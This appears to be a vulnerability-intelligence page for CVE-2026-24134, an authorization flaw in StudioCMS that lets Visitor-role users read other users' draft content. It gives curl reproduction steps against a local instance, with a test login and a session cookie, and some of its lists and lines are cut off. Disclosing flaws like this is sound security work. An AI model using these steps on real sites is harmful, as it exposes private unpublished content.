CVE-2026-24134 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
StudioCMS contains a Broken Object Level Authorization (BOLA) vulnerability in the Content Management feature that allows users with the "Visitor" role to access draft content created by Editor/Admin/Owner users.
The Issue:
The endpoint /dashboard/content-management/edit?edit={UUID} validates user authentication but does NOT validate:
This allows users with "Visitor" role (lowest privilege) to access draft content created by Editor/Admin/Owner users by directly accessing the edit URL with the content UUID.
dummy04)dummy01)Reproduction Steps:
Step 1 - Create draft as Editor:
http://localhost:4321/dashboard/content-management http://localhost:4321/dashboard/content-management/edit?edit=bad87630-69a4-4cd6-bcb2-6965839dc148
Copy this UUID: bad87630-69a4-4cd6-bcb2-6965839dc148
Step 2 - Access draft as Visitor:
curl -X POST "http://127.0.0.1:4321/studiocms_api/auth/login" -F 'username=dummy01' -F 'password=dummy01pass$'
Proof of Visitor permission
<img width="1899" height="450" alt="02" src="https://github.com/user-attachments/assets/aabd47d3-163f-4a56-8296-08bd40c5ccdc" />Access Editor's draft using the UUID
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.
curl "http://127.0.0.1:4321/dashboard/content-management/edit?edit=bad87630-69a4-4cd6-bcb2-6965839dc148" -H "Cookie: auth_session=qvawh6zv23hc2spu6xx7pzgrnn4rpd3q" -v
Result: Returns full HTML page with draft content (200 OK)
Impact Scenarios:
Information Disclosure:
Privacy Violation:
Business Impact:
Complete RBAC Bypass: